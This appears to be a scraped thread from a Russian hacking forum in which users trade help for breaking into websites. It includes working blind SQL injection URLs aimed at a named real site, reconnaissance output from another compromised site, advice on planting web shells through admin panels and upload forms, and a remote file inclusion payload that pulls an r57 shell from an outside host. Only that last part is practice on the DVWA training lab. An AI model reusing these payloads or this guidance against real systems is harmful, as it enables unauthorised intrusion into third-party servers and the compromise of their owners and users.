 |
|
26.01.2012, 23:34
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
Такой вопрос,
Сообщение от None
http://britishcat.ru/articlees5314+union+select+1,2,3,4.html
Скуля там или нет? если да то правильно ли я её разкручиваю(ну в смысле подбора колонок) |
|
|
27.01.2012, 00:42
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от qaz
Такой вопрос,
Скуля там или нет? если да то правильно ли я её разкручиваю(ну в смысле подбора колонок)
Скуля однозначно
Код:
http://britishcat.ru/articlees5354/**/and/**/1=1.html TRUE
http://britishcat.ru/articlees5354/**/and/**/1=2.html FALSE
http://britishcat.ru/articlees5354/**/and/**/1=1/**/group/**/by/**/1.html
Крути как слепую
Код:
http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=5.html TRUE
http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=4.html FALSE
|
|
|
|
27.01.2012, 01:17
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от qaz
Народ, помогите разкрутиить скулю, никак не могу подобрать количество колонок
Код:
Цhttp://www.gorod-dolgoprudny.ru/auto_ads.php?aid=7'
Ничё интересного там нет... Прав на запись тоже...
Код:
FreeBSD cl1108.azar-a.net 8.2-RELEASE-p3 FreeBSD 8.2-RELEASE-p3 #0:
1004 ( apache ) Group: 1003 ( apache )
5.2.17
Safe mode: OFF
/home/admin/domains/gorod-dolgoprudny.ru/public_html/ drwxr-xr-x
|
|
|
|
27.01.2012, 02:49
|
|
Новичок
Регистрация: 20.01.2012
Сообщений: 9
Провел на форуме:
2435
Репутация:
0
|
|
Имею дело с самописным мини-движком, имею доступ в админ-панель где можно добавлять категории, юзеров и редактировать новости, когда редактирую новости имею возможность управлять с исходным кодом страницы html, решил вставить туда шелл но открывается Bad Request. КАК можно использовать имея доступ к html?
|
|
|
|
27.01.2012, 03:19
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от h.elg
Имею дело с самописным мини-движком, имею доступ в админ-панель где можно добавлять категории, юзеров и редактировать новости, когда редактирую новости имею возможность управлять с исходным кодом страницы html, решил вставить туда шелл но открывается Bad Request. КАК можно использовать имея доступ к html?
если там только html то никак, ищи другие возможности, качалки там разные, в редакторах обычно качалка шела есть
|
|
|
|
27.01.2012, 04:28
|
|
Познающий
Регистрация: 24.06.2010
Сообщений: 95
Провел на форуме:
26362
Репутация:
1
|
|
BigBear через фото галерею шелл запилил?
|
|
|
|
27.01.2012, 11:48
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Iggy
BigBear
через фото галерею шелл запилил?
нет, не через фотогалерею.
|
|
|
|
27.01.2012, 18:01
|
|
Новичок
Регистрация: 31.12.2011
Сообщений: 25
Провел на форуме:
6075
Репутация:
0
|
|
Решил научиться php injection но у меня чето не получается залить шелл, уверен что делаю какую то мелочь не так поэтому не получается но что не так не знаю.
Есть тренировочный сайт DVWA , в разделе File Inclusion в строке http://localhost/denwer/dvwa/vulnerabilities/fi/?page=include.php после page как описано в статье вставляю свой шелл вот так http://localhost/denwer/dvwa/vulnerabilities/fi/?page=http://msp.hut4.ru/r57shell и вместо шелла мне показывает ошибки :
Если я пишу любое слово после page= то показывает ошибки :
Или здесь не возможен php include ? потомучто всместо слова include должно быть main ?
Только прошу пожалуйста не трогайте мой сайт msp пока я еще не разобрался , мне он нужен для тренировок )
Помогите пожалуйста , очень хочу научиться. Поидее в DVWA на легком уровне должно все работать.
Спасибо. |
|
|
|
27.01.2012, 19:03
|
|
Новичок
Регистрация: 20.01.2012
Сообщений: 9
Провел на форуме:
2435
Репутация:
0
|
|
Нашел там прикрепить фотографию к новосте, открывается страница uploadp.php, пробовал загрузил шелл, пишет unable to move file...
|
|
|
|
27.01.2012, 19:36
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363
Репутация:
11
|
|
Сообщение от NZT
Решил научиться php injection но у меня чето не получается залить шелл, уверен что делаю какую то мелочь не так поэтому не получается но что не так не знаю.
Есть тренировочный сайт DVWA , в разделе File Inclusion в строке http://localhost/denwer/dvwa/vulnerabilities/fi/?page=include.php после page как описано в статье вставляю свой шелл вот так http://localhost/denwer/dvwa/vulnerabilities/fi/?page=http://msp.hut4.ru/r57shell и вместо шелла мне показывает ошибки
Если я пишу любое слово после page= то показывает ошибки
Или здесь не возможен php include ? потомучто всместо слова include должно быть main ?
Только прошу пожалуйста не трогайте мой сайт msp пока я еще не разобрался , мне он нужен для тренировок )
Помогите пожалуйста , очень хочу научиться. Поидее в DVWA на легком уровне должно все работать.
Спасибо. подставляй http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
